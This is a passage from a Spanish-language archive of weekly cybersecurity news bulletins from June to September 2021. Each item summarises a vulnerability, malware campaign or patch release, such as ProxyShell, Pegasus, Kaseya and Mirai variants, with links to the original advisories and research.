https://asset-group.github.io/disclosures/braktooth/
3 de septiembre de 2021
Boletín semanal de ciberseguridad 14-27 agosto
Múltiples atacantes explotando las vulnerabilidades de Exchange ProxyShell El investigador de seguridad Kevin Beaumont ha estado analizando la explotación masiva de vulnerabilidades en Microsoft Exchange Server conocidas como ProxyShell, un conjunto de errores revelados por Orange Tsai en la BlackHat y que contienen las siguientes vulnerabilidades: CVE-2021-34473, CVE-2021-34523 y CVE-2021-31207. En su publicación, Beaumont, además de explicar cómo poder identificar posibles sistemas afectados, también señala la urgencia de corregir estas vulnerabilidades cuánto antes, puesto que según señala una investigación llevada a cabo por Symantec el grupo de ransomware llamado LockFile estaría aprovechando estas vulnerabilidades en servidores Exchange para acceder a las redes de las víctimas, y a continuación, utilizar la vulnerabilidad de PetitPotam, que no ha sido parcheada por completo, para acceder al controlador de dominio y, posteriormente, extenderse por la red. Por el momento, se han identificado al menos 10 empresas afectadas por la campaña, ubicadas prioritariamente en Estados Unidos y Asia. Dada la gravedad de la situación, desde la CISA también se ha publicado una guía para identificar los sistemas afectados y posibles correcciones. Por su parte, el equipo de Exchange de Microsoft ha emitido un aviso alertando de la publicación la semana pasada de información sobre las vulnerabilidades que se conocen en conjunto con el nombre de ProxyShell. El motivo de la publicación es confirmar que, con las actualizaciones de los boletines de mayo y julio, los servidores Exchange estarían protegidos frente a ProxyShell, además de alertar de la necesidad de mantener este tipo de servicios correctamente actualizados. Dentro del artículo también se aportan una serie puntos, de cara a identificar servidores Exchange vulnerables. Asimismo, investigadores de Huntress han publicado en los últimos días varias actualizaciones en el post donde están analizando estas vulnerabilidades, para informar de la detección de más de 140 webshells que se habrían instalado en servidores vulnerables, pertenecientes a empresas de distintos sectores y tamaños. Según informan los investigadores, algunas de las fechas en que se habrían modificado las configuraciones se remontan a los meses de marzo, abril, junio y julio, por lo que podrían estar relacionadas con ProxyLogon. Más detalles: https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c Vulnerabilidades en Realtek explotadas para distribuir malware A mediados de agosto, investigadores de IoT Inspector Research Lab divulgaban cuatro vulnerabilidades en un SDK de software distribuido en los chipsets de Realtek que estarían afectado miles de dispositivos inteligentes de, al menos, 65 proveedores. De entre los cuatro fallos descubiertos, destacaba la vulnerabilidad crítica clasificada con el identificador CVE-2021-35395 CVSSv3 9.8. La explotación efectiva de estos errores permitiría a un agente amenaza no autenticado comprometer el dispositivo de destino y ejecutar código arbitrario. Aunque Realtek lanzó parches un día antes de que IoT Inspector publicara sus hallazgos, investigadores de Seamless Network han detectado intentos de explotación de estas vulnerabilidades para propagar una variante del malware Mirai. Asimismo, y según los escaneos de Seamless Network, los modelos de dispositivos más comunes que ejecutan actualmente el SDK vulnerable de Realtek serían los siguientes: Netis E1+ extender, Edimax N150 y N300 Wi-Fi router, Repotec RP-WR5444 router, recomendando a los propietarios contactar con sus proveedores para solicitar parches de firmware. Toda la info: https://securingsam.com/realtek-vulnerabilities-weaponized/ Expuestos 38 millones de registros por una mala configuración de Microsoft Power Apps El equipo de UpGuard ha publicado un informe acerca de una configuración incorrecta en Microsoft Power Apps, que habría dado lugar a la exposición de más de 38 millones de registros de datos personales. Microsoft Power Apps permite crear aplicaciones personalizadas a empresas e instituciones, pudiendo habilitar la API de OData (protocolo de datos abiertos) para recuperar datos de los usuarios de las listas de Power Apps. El 24 de mayo UpGuard detectó que se podía acceder de manera anónima a listas con datos de Power Apps mediante la API de Odata, debido a que los accesos no están limitados de manera predeterminada. En la investigación se descubrieron miles de listas accesibles en cientos de portales, entre los que se encuentran empresas privadas y administraciones públicas; con una diversidad de datos que van desde correos electrónicos, citas de vacunación, nombres y apellidos, números de teléfono, o números del seguro social. Desde Microsoft se ha cambiado la configuración predeterminada para abordar este problema además de ponerse en contacto con los clientes afectados, al igual que ha hecho UpGuard avisando a 47 entidades afectadas. Para saber más: https://www.upguard.com/breaches/power-apps Nuevo exploit de iPhone utilizado para desplegar el software espía Pegasus Investigadores de Citizen Lab han detectado un nuevo exploit zero-click de iMessage, denominado FORCEDENTRY, que habría sido utilizado para desplegar el software espía Pegasus de NSO Group. Se indica que este habría sido utilizado en los iPhone de nueve activistas de Bahrein, incluidos miembros del Centro de Derechos Humanos de Bahrein, Waad, Al Wefaq, entre junio de 2020 y febrero de 2021. Se cree que al menos cuatro de los activistas fueron comprometidos por LULU, un operador de Pegasus que se atribuye con gran confianza al gobierno de Bahréin. Además, destaca que uno de los activistas comprometidos, residía ya en Londres cuando fue comprometido, siendo este, por tanto, el primer compromiso documentado realizado por el gobierno de Bahréin de un dispositivo que fue utilizado por un activista en Europa. En el informe de Citizen Lab, también se indica que los activistas fueron comprometidos mediante el uso de otro exploit ya conocido de iMessage de zero-click denominado KISMET 2020. Los expertos recomiendan deshabilitar iMessage y FaceTime para evitar este tipo de compromiso, aunque consideran que Pegasus dispone de muchos otros exploits en su arsenal. Todos los detalles: https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/ Vulnerabilidad en el protocolo Kalay afecta a millones de dispositivos IoT Investigadores de Mandiant han descubierto, en coordinación con la Agencia de Ciberseguridad y Seguridad de las Infraestructuras (CISA), una vulnerabilidad en dispositivos IoT que emplean el protocolo de red Kalay del fabricante ThroughTek. La vulnerabilidad, clasificada como CVE-2021-28372, permite la conexión remota no autorizada a los dispositivos por parte de un atacante, comprometiendo así su integridad y permitiendo la escucha de audio, el visionado de vídeo en tiempo real e incluso el compromiso de las credenciales del dispositivo. El fabricante, por el momento ha sido incapaz de determinar la cantidad de dispositivos afectados debido a la forma que se integra el protocolo en el software de los productos, si bien, se estima que hay al menos 85 millones de dispositivos activos que emplean este protocolo. Las versiones previas a la 3.1.10 y la 3.4.2.0 están afectadas por esta vulnerabilidad. Más info: https://www.fireeye.com/blog/threat-research/2021/08/mandiant-discloses-critical-vulnerability-affecting-iot-devices.html
27 de agosto de 2021
Boletín semanal de ciberseguridad 31 de julio-13 agosto
Vulnerabilidades en servicios DNS-as-a-Service Los investigadores Shir Tamari y Ami Luttwak, de la firma de seguridad Wiz, desvelaban en el congreso de seguridad Black Hat múltiples vulnerabilidades que podrían afectar a servicios DNS-as-a-Service (DNSaaS). En concreto, afirmaban que una de ellas habría sido probada y explotada con éxito al menos en tres proveedores de la nube como AWS, Route53 y Google Cloud Plataform. Asimismo, señalaban que todos los proveedores de DNSaaS podrían ser vulnerables. Este fallo se debe a que la mayoría de los proveedores de DNS no incluyen en blacklist sus propios servidores DNS dentro de sus backends. Los investigadores confirmaban que, de aprovecharse, un actor amenaza podría exfiltrar información sensible de las redes corporativas como direcciones IP internas y externas, tickets NTLM o de Kerberos, pudiendo llegar incluso a mapear la compañía. Wiz expone que pudieron recopilar información de más de 15.000 organizaciones en 14 horas, exponiendo que el riesgo es elevado. Por su parte, Amazon y Google han emitido actualizaciones que resolverían este fallo, afirmando este segundo al medio The Record Media que no habrían encontrado actividad maliciosa relacionada. Más información: https://www.blackhat.com/us-21/briefings/schedule/#a-new-class-of-dns-vulnerabilities-affecting-many-dns-as-service-platforms-23563 Campañas maliciosas empleando Prometheus TDS para distribuir malware Investigadores de Group IB han publicado el análisis de dos campañas maliciosas que utilizan el servicio clandestino Prometheus Traffic Direction System (TDS) para la distribución de diferentes familias de malware como BazarLoader, IcedID, QBot, SocGholish, Hancitor y Buer Loader. La Cyber Kill Chain empleada en una infección donde se ha utilizado el servicio de Prometheus TDS es multifase. En primer lugar, la víctima recibe un correo electrónico malicioso donde podrían adjuntarse tres elementos diferentes: un archivo HTML, un enlace a una webshell o un documento de Google Docs; todos ellos acabarían redireccionando a la víctima a sitios web maliciosos controlados por Prometheus. Tras acceder a la URL maliciosa, se inicia la segunda fase, que tiene como objetivo la descarga de Prometheus Backdoor, herramienta encargada de recolectar datos del usuario como la IP, el User Agent o referer, entre otros. Una vez recopilados los datos, estos son enviados al panel administrado por Prometheus TDS, y, tras ser analizados, o bien se redirige a la víctima a una URL nueva o se le envía un archivo malicioso de Word, Excel, ZIP o RAR que descargará alguna de las familias de malware mencionadas. Según afirman los investigadores, habrían localizado dos campañas activas diferentes, una dirigida contra la población belga y otra contra empresas, universidades y organizaciones gubernamentales de Estados Unidos. Más información: https://blog.group-ib.com/prometheus-tds Ataques de fuerza bruta de la botnet StealthWorker contra dispositivos de Synology El equipo de respuesta de incidentes de Synology ha detectado un incremento en el volumen de ataque de fuerza bruta contra sus dispositivos. Los investigadores consideran que los ataques tendrían su origen en la botnet conocida como StealthWorker, identificada por Malwarebytes en una campaña de fuerza bruta en febrero de 2019. En estos ataques se emplean diversos dispositivos ya infectados para lanzar ataques de fuerza bruta en los que se prueban las credenciales de administración más comunes en otros dispositivos. En caso de éxito, el agente amenaza lograría acceso al sistema para instalar malware que podría incluir capacidades de cifrado (ransomware). Asimismo, según los datos recopilados, los sistemas afectados podrían ser a su vez utilizados en ataques a otros dispositivos basados en Linux, incluyendo los NAS (Network-Attached-Storage) de Synology. La firma recomienda encarecidamente a sus clientes que revisen sus sistemas para modificar credenciales débiles, activar el bloqueo automático y la protección de cuenta, así como contar, en caso de ser posible, con un sistema de autenticación MFA (Multi-Factor Authentication). Más información: https://blog.cyble.com/2021/08/08/one-million-credit-cards-leaked-in-a-cybercrime-forum-for-free/ Boletín mensual de Microsoft Microsoft ha publicado su boletín de seguridad de agosto donde incluye correcciones para 44 vulnerabilidades, siete de ellas críticas. Dentro del conjunto de vulnerabilidades la firma ha corregido tres nuevos 0-days, uno de los cuales estaría siendo ya activamente explotado: CVE-2021-36948: Vulnerabilidad de elevación de privilegios en el sistema Windows Update Medic, para la que se ha detectado explotación activa. CVE-2021-36942: Vulnerabilidad de suplantación de identidad en Windows LSA. CVE-2021-36936: Vulnerabilidad de ejecución remota de código en Windows Print Spooler. Además, es relevante mencionar que Microsoft ha corregido importantes vulnerabilidades aparecidas durante las últimas semanas, entre las que destacan: PrintNightmare CVE-2021-34527: Si bien ya fue parcheada la parte de ejecución de código remoto, no fue así el componente de elevación local de privilegios CVE-2021-34481, que podía aprovecharse mediante la función Point and Print para instalar controladores de impresión maliciosos. PetitPotam CVE-2021-36942: Se ha corregido el vector que permitía explotar el fallo de seguridad al no poder obligar a un controlador de dominio autenticarse contra otro servidor. Finalmente, también cabe destacar la actualización de una vulnerabilidad CVE-2020-0765 en Remote Desktop Connection Manager (RDCMan), una aplicación cuyo uso se desaconsejaba desde Microsoft en marzo de 2020 pero que volvía a la vida este mes de junio con el lanzamiento de la versión 2.8. En el boletín de agosto, Microsoft anuncia una nueva vulnerabilidad en la aplicación y recomienda actualizar a la versión 2.82. Más información: https://msrc.microsoft.com/update-guide/releaseNote/2021-Aug LockBit anuncia la filtración de datos de Accenture El grupo de Ransomware-as-a-Service Lockbit anunciaba esta semana a través de su portal de la dark web, la publicación de una serie de datos relacionados con la compañía Accenture, que podrían haber sido sustraídos durante un ataque de ransomware del grupo. Según un informe de Cyberscoop, la multinacional habría conseguido detectar el incidente el pasado 30 de julio y fruto de ello se habrían aislado los servidores vulnerados, mitigado la amenaza y restaurado los sistemas afectados mediante copias de seguridad. Esto implicaría que, actualmente, el nivel de riesgo de posible infección es prácticamente inexistente para los sistemas que cuentan con una comunicación directa con las redes de Accenture. Asimismo, la firma reconoce que los atacantes habrían tenido acceso a documentos que harían referencia a un número reducido de clientes y materiales de trabajo que la firma habría preparado para sus clientes, pero que en ningún caso se trata de documentos con un nivel de confidencialidad muy elevado. Atendiendo a las filtraciones de los operadores de LockBit, el grupo publicaba el miércoles una primera filtración que borraba al poco tiempo para inmediatamente postponer la fecha y hora de publicación de nueva información. Un día más tarde aportaban evidencias de la vulneración de los sistemas de Accenture y de nuevo reiniciaban la cuenta atrás de su portal, anunciándose una tercera fecha para el 13 de agosto a las 22:43h (hora española). Más información: https://www.cyberscoop.com/accenture-ransomware-lockbit/
13 de agosto de 2021
Boletín semanal de ciberseguridad 17-23 de julio
Publicada una investigación sobre ciberespionaje a nivel mundial Un consorcio formado por diferentes organizaciones y medios de prensa ha publicado una investigación donde se desvela la comercialización y uso indiscriminado del software espía Pegasus. Según los investigadores, una filtración de datos habría permitido identificar al menos a 10 gobiernos como posibles clientes de la empresa israelí NSO Group, propietaria de Pegasus. Esta filtración contiene una lista de más de 50.000 números de teléfono de “personas de interés” desde el año 2016. Entre las víctimas identificadas se incluirían ejecutivos de empresas, personalidades religiosas, académicas, empleados de ONGs, dirigentes sindicales y miembros de diferentes gobiernos. Entre las funcionalidades de Pegasus destaca apuntar a dispositivos iOS o Android con el fin de exfiltrar mensajes, correos electrónicos, fotos, grabar llamadas y activar micrófonos. Tanto la compañía como algunos de los Estados involucrados han desmentido su utilización para tales fines. Cabe destacar que este software espía fue utilizado, supuestamente, el pasado año para infectar, presuntamente, el dispositivo de Jeff Bezos. Tras conocerse la noticia, se han ido conociendo novedades y reacciones. Por un lado, Amazon Web Services ha informado del cierre de infraestructura y cuentas vinculadas a la compañía NSO Group, propietaria de Pegasus, tras hacerse público que la empresa habría utilizado la infraestructura de AWS para llevar a cabo las tareas de espionaje. Por otro lado, el precio de las acciones de Apple sufrió en el día de ayer una bajada al conocerse la explotación activa de múltiples 0-days en un iPhone 12 actualizado al último sistema operativo iOS 14.6. Cabe destacar, además, que la Oficina de las Naciones Unidas en Ginebra ha publicado un tweet donde ha recordado a los Estados que todas las medidas de vigilancia deben llevarse a cabo bajo circunstancias justificadas y definidas estrictamente, con un objetivo legítimo, siendo proporcionales a este. Más información: https://amp.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus Campaña de distribución de malware contra usuarios corporativos de habla hispana El equipo de Proofpoint ha identificado un nuevo grupo amenaza, al que ha denominado como TA2721, que estaría distribuyendo malware a través de correos electrónicos en castellano. Este grupo se estaría dirigiendo contra usuarios con apellidos hispanos que pertenecen a organizaciones globales de diferentes sectores. Al tratarse de objetivos específicos, los investigadores plantean la posibilidad de que el grupo realice algún tipo de reconocimiento de las entidades objetivo antes de enviar los correos fraudulentos. La cadena de infección de TA2721 se caracteriza por la utilización de documentos PDF adjuntos en los correos, que contienen una URL que redirige a la descarga de un fichero cifrado y comprimido tipo .RAR el cual, finalmente, instala el malware Bandook en el equipo de la víctima, un malware antiguo tipo RAT no muy común. Los investigadores han detectado que este agente amenaza tiende a utilizar la misma infraestructura C2 durante varias semanas o meses; de hecho, en seis meses, Proofpoint solamente ha identificado tres dominios que actuarían como C2. Más detalles: https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook SeriousSAM: vulnerabilidad de escalada de privilegios en Windows 10 El investigador de seguridad Jonas Lyk junto con otros expertos, han descubierto una vulnerabilidad en Windows 10 que permitiría a agentes amenaza escalar privilegios para acceder a las contraseñas hasheadas de las cuentas de usuario y a detalles importantes de la configuración del sistema. Bajo el nombre de SeriousSAM (CVE-2021-36934), este fallo reside en el modo en el que Windows 10 controla los accesos a directorios como SAM, SECURITY y SYSTEM (dentro de C:\Windows\System32\config\) desde la versión Windows 10 v1809. En estas versiones, Microsoft falla al restringir los accesos a estos ficheros de configuración en las copias de seguridad que genera la funcionalidad de Windows Shadow Volume Copy. Microsoft todavía no ha publicado parches de seguridad ni de medidas de mitigación para esta vulnerabilidad. Sin embargo, sí ha compartido una solución alternativa mientras sigue investigando este fallo de seguridad. De forma paralela, en Reddit, se han publicado algunos consejos para los administradores de sistemas y proveedores de seguridad sobre cómo registrar y monitorizar los accesos a los datos de SAM. Por otra parte, Kevin Beaumont ha publicado una prueba de concepto que permitiría a los administradores de sistemas comprobar cuáles de sus sistemas son vulnerables a estos ataques. Finalmente, el US-CERT también ha publicado una nota informativa sobre el fallo. Toda la info: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934 XLoader: variante de Formbook para Windows y MacOS Investigadores de CheckPoint han publicado un informe acerca del malware XLoader, variante del malware Formbook. De acuerdo con la investigación, recientemente se habría detectado la comercialización en foros underground de un nuevo malware llamado XLoader, que se anunciaría como una botnet multiplataforma y que sería capaz de robar información en sistemas Windows y MacOS. Se tiene constancia de que esta nueva variante surgió en febrero de 2021 y es una evolución del ya conocido Formbook, un stealer que sigue prevaleciendo cinco años después de su activación y que estaría dirigido contra equipos Windows. XLoader es un malware mucho más sofisticado que Formbook, cuenta con la capacidad de recopilar credenciales de navegadores web y de algunos clientes de correo electrónico, realizar capturas de pantalla, registrar pulsaciones de teclado y ejecutar otros tipos de malware. Se trata de un Malware-as-a-Service en el que los clientes pueden alquilar la versión para macOS y el vendedor les proporciona acceso a un servidor que les permitiría gestionar los dispositivos vulnerados. De este modo, los atacantes también mantienen un control sobre el uso que sus clientes dan a la herramienta. Finalmente, cabe destacar que la mayoría de las víctimas de XLoader se sitúan en EE.UU. Para saber más: https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de Telefónica Tech. Visita la página de CyberSecurityPulse.
23 de julio de 2021
Boletín semanal de ciberseguridad 10-16 de julio
Actualización del incidente de Kaseya VSA Tras conocerse el pasado día 2 de julio el ataque realizado por el grupo de ransomware REvil mediante Kaseya VSA, el domingo 11 de julio, Kaseya lanzó el parche para su software VSA (VSA 9.5.7a), estando disponible para clientes de VSA On-Premise y VSA SaaS. Con esta actualización se corrigen las vulnerabilidades catalogadas como CVE-2021-30116, CVE-2021-30119 y CVE-2021-30120, que permitían la fuga de credenciales, Cross-Site Scripting (XSS) y elusión del doble factor de autenticación, respectivamente. Esta nueva versión también corrige un fallo que permitía la carga de archivos sin autorización a un servidor VSA, además de utilizar el indicador de seguridad para las cookies de sesión del portal de usuario ya que no se estaba utilizando; también se han implementado mejoras en la seguridad de las respuestas de la API. En relación con el incidente, cabe destacar por otro lado la publicación este sábado de un artículo en Bloomberg, que recoge declaraciones de varios ex empleados de la compañía quienes aseguraban que desde hace años advirtieron sobre problemas graves en el software que no habrían sido tenidos en cuenta ni solucionados. Toda la información: https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021 SolarWinds corrige un nuevo 0-day activamente explotado La compañía de software SolarWinds, quienes experimentaban el pasado año una de las campañas de ciberespionaje más sofisticada de los últimos tiempos, ha lanzado una actualización para una vulnerabilidad de día cero catalogada como CVE-2021-35211, la cual estaría afectando a su producto Serv-U. Según informan desde SolarWinds en su propio aviso, investigadores de Microsoft informaban a la tecnológica de una vulnerabilidad de ejecución remota de código (RCE por sus siglas en inglés) que estaba siendo activamente explotada. De ser aprovechada, un actor malicioso podría obtener acceso privilegiado en el host que aloje el producto Serv-U. Desde la compañía se desconoce el alcance real del fallo, por lo que no han aportado más detalles. Los productos afectados son Serv-U Managed File Transfer y Serv-U Secure FTP desde su versión 15.2.3 HF1 y anteriores. Desde SolarWinds han habilitado una actualización segura en la versión 15.2.3 HF2, a la que se recomienda actualizar. Tras la publicación de la actualización de seguridad de SolarWinds, Microsoft publicaba nuevos detalles de la investigación llevada a cabo donde especifican que detectaron un exploit empleado en ataques dirigidos contra el producto Serv-U de SolarWinds y los atribuían a un actor de amenaza denominado DEV-0322. Según los investigadores, la actividad del citado grupo estaría localizada en China y emplearía soluciones de VPN comerciales, así como routers comprometidos como infraestructura de ataque. Consecuentemente, Microsoft observó que los objetivos de la campaña eran entidades norteamericanas de los sectores de software y defensa. Más detalles: https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211 Vulnerabilidad RCE crítica en ForgeRock Access Manager activamente explotada Agencias de Ciberseguridad de Australia y Estados Unidos están alertando de una vulnerabilidad crítica de ejecución remota de código (RCE por sus siglas en inglés) en ForgeRock Access Management, aplicación de código abierto utilizada para la gestión de permisos en aplicaciones internas, catalogada como CVE-2021-35464. Este fallo fue descubierto y divulgado el pasado 29 de junio por Michael Stepankin, investigador de seguridad de PortSwigger. ForgeRock indica que este fallo afectaría a las versiones de Access Management (AM) inferiores a la 7.0 que ejecutan Java 8. Desde la compañía se recomienda aplicar los parches publicados el pasado 29 de junio sin demora, puesto que la vulnerabilidad se encuentra activamente explotada. Para saber más: https://backstage.forgerock.com/knowledge/kb/article/a47894244 Boletín mensual de Microsoft Microsoft ha publicado su boletín de seguridad de julio donde incluye correcciones para 117 vulnerabilidades, trece de ellas críticas. Entre los fallos destacan nueve 0-days, cuatro de los cuales estarían siendo activamente explotados: CVE-2021-34527 (PrintNightmare): Vulnerabilidad de ejecución remota de código en el administrador de impresión de Windows CVE-2021-33771: Vulnerabilidad de elevación de privilegios en el kernel de Windows CVE-2021-34448: Vulnerabilidad de corrupción de memoria del motor de scripting CVE-2021-31979: Vulnerabilidad de elevación de privilegios en el kernel de Windows Además, es importante mencionar tres vulnerabilidades de ejecución remota de código (RCE) las cuales están afectando a Microsoft Exchange Server (CVE-2021-31206), al servidor DNS de Windows (CVE-2021-34494) y al kernel de Windows (CVE-2021-34458). Desde Microsoft recomiendan la actualización de los activos afectados. Toda la info: https://msrc.microsoft.com/update-guide/releaseNote/2021-Jul Distribución de ransomware explotando firmware de SonicWall SonicWall ha emitido un aviso de seguridad con carácter de urgencia ante la detección de una campaña de ransomware basada en la explotación de una vulnerabilidad en el firmware de algunos de sus productos. En concreto, los dispositivos vulnerables serían productos Secure Mobile Access (SMA) serie 100 y Secure Remote Access (SRA) que se encuentren ejecutando versiones del firmware 8.x. Desde la firma, recomiendan de forma urgente actualizar los productos a la versión 9.x. En caso de no ser posible actualizar, proponen las siguientes medidas de mitigación: desconexión inmediata de dispositivos SMA y SRA vulnerables, restablecimiento de las contraseñas y activación de medidas multifactor para la autenticación (MFA). A pesar de que en el aviso de SonicWall no se aporta el detalle de la vulnerabilidad concreta que estaría siendo aprovechada, investigadores de seguridad de Crowdstrike, que descubrían y alertaban de un fallo en este firmware el pasado mes de junio, confirman que se trataría de la misma vulnerabilidad que detallaban en su artículo hace unas semanas y al que identificaban como CVE-2019-7481. Por su parte, desde el equipo de respuesta a incidentes de SonicWall han publicado también un aviso para alertar de este fallo, sin llegar a asociarle el identificador que vinculaban desde Crowdstrike en su artículo, pero otorgándole una severidad de CVSSv3 9.8. Más: https://www.sonicwall.com/support/product-notification/urgent-security-notice-critical-risk-to-unpatched-end-of-life-sra-sma-8-x-remote-access-devices/210713105333210/
16 de julio de 2021
Boletín semanal de ciberseguridad 26-2 de julio
Nueva actividad del actor amenaza Nobelium Microsoft ha publicado una actualización sobre las actividades del actor amenaza ruso conocido como Nobelium (aka APT29), a quien se atribuye el compromiso a la cadena de suministro de SolarWinds a finales de 2020. En esta ocasión, los investigadores advierten de ataques dirigidos de fuerza bruta y password spraying contra entidades en 36 países diferentes, casi la mitad de los cuales se centran en Estados Unidos. Sectorialmente, los ataques están afectando principalmente a empresas tecnológicas (57%) y gubernamentales (20%), así como, en menor medida, a entidades financieras y Think Tanks. Por el momento, se conocen tres compromisos como resultado de esta actividad. Adicionalmente, como parte de esta investigación, Microsoft identificó un troyano dedicado al robo de credenciales instalado en el dispositivo de uno de sus empleados en el área de asistencia a clientes. Con esta intrusión, Nobelium logró acceder a información básica sobre las cuentas de un número limitado de clientes de Microsoft, datos que han sido utilizados para lanzar campañas de phishing dirigido. Información completa: https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/ Microsoft pública detalles técnicos de vulnerabilidades críticas en routers NETGEAR Investigadores de seguridad de Microsoft 365 Defender Research han publicado los detalles de tres vulnerabilidades críticas con puntuación CVSS de entre 7.1 y 9.4 en los routers NETGEAR DGN-2200v1 con versiones anteriores a la v1.0.0.60. Estas fueron notificadas en un aviso de seguridad por Netgear en diciembre de 2020, junto con los detalles para parchear las vulnerabilidades. Las tres vulnerabilidades residen en el componente HTTPd y permiten a un atacante remoto sin autenticar evadir la autenticación y realizar la función de backup para conseguir las credenciales de acceso, así como recuperar estas mediante ataques de canal lateral midiendo el tiempo de respuesta al autenticarse. Estas vulnerabilidades podrían suponer un vector de entrada en las redes internas de las empresas que tengan el puerto de administración expuesto del router vulnerable. Información completa: https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ Campaña de ataques de fuerza bruta por parte de integrantes del GRU ruso Diversas agencias norteamericanas y británicas, NSA, CISA, FBI y NCSC, han publicado una alerta sobre una campaña de ataques de fuerza bruta llevados a cabo desde el directorio Principal del Alto Estado Mayor de las Fuerzas Armadas de la Federación de Rusia (GRU). Según los investigadores, esta campaña se llevaría desarrollando desde mediados de 2019 hasta inicios del presente año, y estaría siendo dirigida contra entidades de diferentes sectores que utilizan principalmente los servicios en la nube de Microsoft Office 365, entre otros. Esta metodología de ataques por fuerza bruta permite a los actores obtener las credenciales de sus víctimas, para posteriormente valerse de estos accesos y realizar movimientos laterales. Asimismo, los investigadores indican que también habrían conseguido explotar las vulnerabilidades CVE 2020-0688 y CVE 2020-17144 de servidores de Microsoft Exchange, con el objetivo de permitir la ejecución remota de código y un mayor acceso en las redes de las víctimas. Se recomienda aplicar las medidas de mitigación y bloqueo de IOCs adjuntos a la nota informativa. Información completa: https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF Nuevas variantes de la botnet Mirai explotan un zero-day en KGUARD DVR Investigadores de Netlab han identificado dos nuevas botnets basadas en el código de Mirai que utilizan una vulnerabilidad de día cero en dispositivos de grabación de vídeo digital KGUARD como método de propagación. La citada vulnerabilidad permite la ejecución remota de código sin autenticación y se encuentra en aquellos dispositivos KGUARD DVR con firmware anterior a 2017, de los cuales se identifican hasta 3000 dispositivos actualmente expuestos online. El análisis de las botnets, bautizadas como mirai_ptea y mirai_aurora, revela que utilizan los proxys de Tor para comunicarse con el C2 y el algoritmo TEA para ocultar datos sensibles, siendo su objetivo final la realización de ataques DDoS. Los investigadores han observado una actividad constante de 2.000 intentos de infección diarios, con picos de hasta 15.000 intentos. Territorialmente, la mayor parte de las infecciones se ubican en Estados Unidos, Corea del Sur y Brasil; aunque su alcance es mundial. Información completa: https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/
2 de julio de 2021
Boletín semanal de ciberseguridad 19-25 de junio
SonicWall corrige una vulnerabilidad crítica que había sido solucionada parcialmente En octubre del año pasado, SonicWall corregía una vulnerabilidad crítica de desbordamiento de búfer en SonicOS bajo el identificador CVE-2020-5135, que afectaba a más de 800.000 dispositivos VPN de SonicWall. Este fallo permitía a atacantes no autenticados la ejecución remota de código en el dispositivo afectado o causar una denegación de servicio mediante el envío de peticiones HTTP específicamente diseñadas al firewall. Sin embargo, el investigador de seguridad Craig Young desvela ahora que este parche dejó sin corregir un fallo de exposición de información de memoria, que ha sido identificado como CVE-2021-20019 y que no había sido solventado hasta la versión más reciente de SonicOS. Más info: https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/ Zyxel alerta a sus clientes de ataques contra sus dispositivos Zyxel ha alertado a sus clientes, a través de correo electrónico, sobre una serie de ataques dirigidos contra sistemas VPN, firewall y balanceadores de carga que la compañía ofrece y que tienen habilitada la administración remota vía SSL-VPN. En concreto, estos ataques irían dirigidos contra dispositivos de red de las series USG, ZyWALL, USG FLEX, ATP y VPN que ejecutan el firmware ZLD en local. Según expone Zyxel, el atacante trata de acceder al dispositivo vía WAN y si lo consigue, intenta eludir los sistemas de autenticación y establecer una conexión VPN a través de un túnel SSL con un usuario desconocido (p.ej: "zyxel_slIvpn", "zyxel_ts", "zyxel_vpn_test") para manipular la configuración del dispositivo. Por el momento, se desconoce si el vector de entrada de estos ataques es una vulnerabilidad antigua presente en dispositivos sin parchear o si se trata de una nueva vulnerabilidad 0-day. Pese a ello, Zyxel ha compartido una serie de medidas de mitigación frente a esta amenaza. Todos los detalles: https://therecord.media/zyxel-says-a-threat-actor-is-targeting-its-enterprise-firewall-and-vpn-devices/ Matanbuchus: nuevo Malware-as-a-Service Investigadores de Unit 42 de Palo Alto han publicado los detalles de un nuevo Malware-as-a-Service (Maas) denominado Matanbuchus Loader. Este MaaS, fue visto por primera vez en febrero de este año en foros underground relacionado con el actor amenaza BelailDemon, quien establecía un precio de 2500 dólares por su adquisición. El vector inicial de distribución del artefacto es un documento Excel con macros maliciosas, el cual ejecutará un archivo descargado de un dominio externo. Matanbuchus cuenta con múltiples capacidades como ejecutar archivos .exe o .dll en memoria, aprovechar el servicio de tareas programadas schtasks.exe para lograr persistencia, ejecutar comandos en PowerShell o utilizar ejecutables del sistema para cargar librerías DLL. Desde Palo Alto han identificado varias organizaciones afectadas por este malware en Estados Unidos y Bélgica. Información completa: https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/ DarkRadiation: nuevo ransomware dirigido a sistemas GNU/Linux con funcionalidades de gusano Investigadores de Trend Micro han analizado el funcionamiento de un ransomware descubierto recientemente, el cual ha sido denominado DarkRadiation y está dirigido a sistemas GNU/Linux. Esta completamente implementado en Bash y la mayoría de sus componentes están dirigidos a las distribuciones Red Hat y CentOS, incluyendo también en menor medida a distribuciones basadas en Debian. Este ransomware utiliza la API de Telegram para comunicación con el servidor C&C y tiene funcionalidades de gusano mediante el protocolo SSH. Para evadir detecciones hace uso de la herramienta de ofuscación de código abierto "node-bash-ofuscate", con la cual los atacantes obtienen cero detecciones en VirusTotal. Los investigadores han observado que este ransomware está en continuo desarrollo, con múltiples versiones pertenecientes a distintas campañas. Para saber más: 